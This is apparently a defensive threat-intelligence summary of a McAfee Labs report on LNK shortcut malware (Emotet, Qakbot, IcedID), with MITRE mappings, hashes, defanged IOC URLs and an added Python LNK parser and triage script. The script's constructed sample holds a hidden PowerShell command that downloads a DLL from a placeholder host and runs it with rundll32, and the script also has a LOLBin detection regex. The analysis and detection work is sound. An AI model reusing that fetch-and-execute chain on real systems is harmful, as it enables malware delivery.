McAfee Labs reports a rise in malware delivered via Windows LNK shortcut files, targeting users with Emotet, Qakbot, and IcedID. The article explains how attackers abuse LNKs that launch PowerShell, CMD, MSHTA, and other built-in tools to download and execute payloads once a victim opens a shortcut delivered by spam email or a malicious URL. #Emotet #Qakbot #IcedID #LNK #PowerShell #MSHTA #Regsvr32
Keypoints
- Windows LNK shortcut files are increasingly used to deliver malware (Emotet, Qakbot, IcedID).
- Attackers distribute LNKs via email spam and malicious URLs, enticing victims to open them.
- Emotet infection chain involves LNK invoking cmd.exe, extracting and executing a VBS payload, then downloading via wscript.exe and executing with Regsvr32.
- IcedID uses highly obfuscated PowerShell parameters that are decrypted at runtime and chained with MSHTA to fetch an installer.
- Qakbot demonstrates hardcoded PowerShell commands that download a DLL via Invoke-WebRequest and run it with rundll32.
- Across campaigns, attackers pair LNKs with PowerShell, CMD, MSHTA, and similar tools to download and execute payloads.
- IOC details include specific SHA-256 hashes for Emotet/IcedID/Qakbot LNKs and several malicious URLs.
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – “Threat actors are using email spam and malicious URLs to deliver LNK files to victims.”
- [T1566.002] Phishing: Spearphishing Link – same delivery statement; the URL-delivered LNKs map here rather than to the attachment sub-technique.
- [T1059.001] PowerShell – “Here, PowerShell LNK has a highly obfuscated parameter … The whole obfuscated argument is decrypted at run-time and then executes MSHTA …”
- [T1059.003] Windows Command Shell – “LNK invokes the Windows Command Processor (cmd.exe). The target path … is only visible to 255 characters. However, command-line arguments can be up to 4096…”
- [T1059.005] Command and Scripting Interpreter: Visual Basic – the VBS stage is run by “Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload.”
- [T1218.005] Mshta – “PowerShell, CMD, and MSHTA to download malicious files.”
- [T1105] Ingress Tool Transfer – “download the main Emotet 64-bit DLL payload”
- [T1027] Obfuscated/Compressed Files and Information – “The parameter is exceptionally long and is not fully visible in the target part. The whole obfuscated argument is decrypted at run-time.”
- [T1218.010] System Binary Proxy Execution: Regsvr32 – “The downloaded DLL is then finally executed using the REGSVR32.EXE utility”
- [T1218.011] System Binary Proxy Execution: Rundll32 – the Qakbot chain runs the DLL fetched by Invoke-WebRequest with rundll32 (see keypoints above).
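The T1059.003 quote above is the practical problem for triage: Explorer's properties dialog truncates what it shows, while the COMMAND_LINE_ARGUMENTS field of the shortcut can carry a much longer PowerShell or MSHTA stage. The following is an added example, not code from the McAfee Labs article: a minimal MS-SHLLINK parser that recovers the full target path and argument string straight from the file, plus a triage pass that flags the LOLBins named in the keypoints. The sample shortcut is constructed in the script itself (no real sample is embedded), and the hostname in it is a placeholder, not an IOC.

```python
"""Minimal MS-SHLLINK (.lnk) parser and triage for shortcut-delivered malware.

Added example, not code from the McAfee Labs article. It parses the
ShellLinkHeader, skips LinkTargetIDList, pulls LocalBasePath out of LinkInfo,
reads the StringData fields (COMMAND_LINE_ARGUMENTS can hold far more than the
~255 characters the Explorer properties dialog displays) and flags LOLBin use.
The sample shortcut is constructed below; the hostname in it is a placeholder.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELPATH),
                 ("working_dir", HAS_WORKDIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON))  # StringData order per spec
LOLBINS = re.compile(r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|regsvr32|rundll32)(\.exe)?\b", re.I)


def build_lnk(local_base_path: str, arguments: str) -> bytes:
    """Constructed LNK: 76-byte header + LinkInfo with LocalBasePath + COMMAND_LINE_ARGUMENTS."""
    flags = HAS_LINKINFO | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # attrs, times, size, icon, showcmd, ...
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"  # DRIVE_FIXED, empty label
    path = local_base_path.encode("ascii") + b"\x00"
    vid_off, hdr = 28, 28  # LinkInfoHeaderSize without the optional unicode offsets
    lbp_off = vid_off + len(volume_id)
    cps_off = lbp_off + len(path)  # empty CommonPathSuffix follows the path
    link_info = struct.pack("<IIIIIII", cps_off + 1, hdr, 0x1, vid_off, lbp_off, 0, cps_off)
    link_info += volume_id + path + b"\x00"
    args = arguments.encode("utf-16-le")
    return header + link_info + struct.pack("<H", len(args) // 2) + args  # CountCharacters = UTF-16 units


def parse_lnk(blob: bytes) -> dict:
    """Return LinkFlags, LocalBasePath (if present) and every StringData field."""
    if len(blob) < 0x4C or struct.unpack_from("<I", blob)[0] != 0x4C or blob[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", blob, 20)[0]
    off = 0x4C
    out = {"flags": flags, "local_base_path": None}
    if flags & HAS_IDLIST:  # IDListSize (u16) followed by the IDList itself
        off += 2 + struct.unpack_from("<H", blob, off)[0]
    if flags & HAS_LINKINFO:  # LinkInfoSize is the block's first field
        li_size, _, li_flags = struct.unpack_from("<III", blob, off)
        if li_flags & 0x1:  # VolumeIDAndLocalBasePath: LocalBasePathOffset at +16
            start = off + struct.unpack_from("<I", blob, off + 16)[0]
            end = blob.index(b"\x00", start)
            out["local_base_path"] = blob[start:end].decode("latin-1")
        off += li_size
    enc = "utf-16-le" if flags & IS_UNICODE else "latin-1"  # ANSI approximated as latin-1
    width = 2 if flags & IS_UNICODE else 1
    for name, bit in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", blob, off)[0]
            off += 2
            out[name] = blob[off:off + count * width].decode(enc)
            off += count * width
        else:
            out[name] = None
    return out


def triage(parsed: dict, visible_limit: int = 255) -> list:
    """Flag the traits the LNK campaigns in the article rely on."""
    findings = []
    target = parsed.get("local_base_path") or ""
    args = parsed.get("arguments") or ""
    if LOLBINS.search(target):
        findings.append(f"target is a script/proxy-execution host: {target}")
    for tool in sorted({m.group(1).lower() for m in LOLBINS.finditer(args)}):
        findings.append(f"arguments invoke {tool}")
    if len(args) > visible_limit:
        findings.append(f"arguments are {len(args)} chars; only ~{visible_limit} show in the properties dialog")
    if re.search(r"https?://", args, re.I):
        findings.append("arguments contain a URL (download stage)")
    return findings


# Constructed sample in the style of the Qakbot chain: PowerShell target, long argument
# (a junk variable stands in for an obfuscated blob) that fetches a DLL and runs it via rundll32.
SAMPLE_ARGS = ("-nop -w hidden -c \"$j='" + "A" * 300 + "';"
               "Invoke-WebRequest http://example.invalid/B.png -OutFile $env:TEMP\\b.dll;"
               "rundll32 $env:TEMP\\b.dll,DllRegisterServer\"")
SAMPLE_LNK = build_lnk(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", SAMPLE_ARGS)

if __name__ == "__main__":
    info = parse_lnk(SAMPLE_LNK)
    print("target   :", info["local_base_path"])
    print("arguments:", info["arguments"][:80], "...")
    for finding in triage(info):
        print(" !", finding)
```

Point `parse_lnk` at the bytes of a quarantined shortcut (never double-click it) to read the whole argument string; the parser deliberately ignores ExtraData blocks and the IDList contents, which is enough for the argument and target fields but not for shortcuts whose target lives only in the IDList.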
Indicators of Compromise
- [SHA-256] Emotet LNK – 02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71
- [SHA-256] IcedID LNK – 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9
- [SHA-256] Qakbot LNK – b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172
- [URLs] C2/malicious hosts – hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/, hxxps://hectorcalle[.]com/093789.hta, hxxps://hectorcalle[.]com/listbul.exe, hxxps://green-a-thon[.]com/LosZkUvr/B.png (and 4 more URLs)
Read more: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/